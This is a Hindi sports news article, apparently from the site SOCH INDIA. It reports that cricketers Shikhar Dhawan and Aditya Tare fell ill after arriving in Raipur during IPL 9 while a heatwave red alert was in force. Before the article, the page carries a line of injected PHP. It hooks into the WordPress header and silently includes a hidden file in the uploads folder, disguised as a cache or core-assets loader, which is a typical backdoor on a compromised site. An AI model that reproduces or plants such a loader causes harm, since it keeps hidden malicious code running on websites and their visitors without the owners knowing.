add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रायपुर आते ही बिगड़ी शिखर धवन- तारे की तबीयत, मैच खेल पाना तय नहीं – SOCH INDIA
Menu

खेल
रायपुर आते ही बिगड़ी शिखर धवन- तारे की तबीयत, मैच खेल पाना तय नहीं

nobanner

रायपुर आते ही बिगड़ी शिखर धवन- तारे की तबीयत, मैच खेल पाना तय नहीं
– डॉक्टरों का कहना है कि तेज गर्मी की वजह से दोनों खिलाड़ियों की तबीयत खराब हुई।
– ‘आदित्य को डीहाइड्रेशन हुआ था, उन्हें अस्पताल में एडमिट कर करीब 1 घंटे तक अंडर ऑब्जरवेशन रखा गया। इसके बाद डिस्चार्ज कर दिया गया।’
– फिलहाल डॉक्टर्स ने उन्हें रेस्ट करने की सलाह दी है।
– आदित्य ने बुधवार दोपहर भी करीब 2 घंटे तक स्टेडियम में प्रैक्टिस की थी।
– शिखर धवन की तबीयत किस वजह से बिगड़ी, इसके बारे में फिलहाल जानकारी नहीं मिल पाई है।
प्रैक्टिस के लिए भी नहीं पहुंचे धवन
– शिखर धवन और युवराज सिंह बुधवार शाम की फ्लाइट से रायपुर पहुंचे।
– बताया जा रहा है कि रायपुर पहुंचते ही टेम्परेचर में बदलाव के चलते धवन की तबीयत खराब हो गई थी।
– इस वजह से सुबह भी वे प्रैक्टिस के लिए नहीं पहुंचे थे।
खेलने पर संशय
– आईपीएल 9 में हैदराबाद की टीम लगातार बेहतर प्रदर्शन कर रही है।
– टीम पहले ही प्ले-ऑफ में जगह बना चुकी है ऐसे में रायपुर के दर्शकों में टीम के स्टार प्लेयर्स धवन और युवराज को खेलते देखने का बेहद क्रेज है।
– लेकिन तबीयत खराब होने के बाद कल शिखर खेल पाएंगे या नहीं, इस पर संशय बना हुआ है।
छह राज्यों में है अलर्ट
– तेज गर्मी की वजह से छत्तीसगढ़ समेत छह राज्यों में रेड अलर्ट घोषित किया गया है।
– अलर्ट के चलते लोगों को सुबह 11 से शाम 4 बजे तक घरों से बाहर नहीं निकलने के ऑर्डर दिए गए हैं।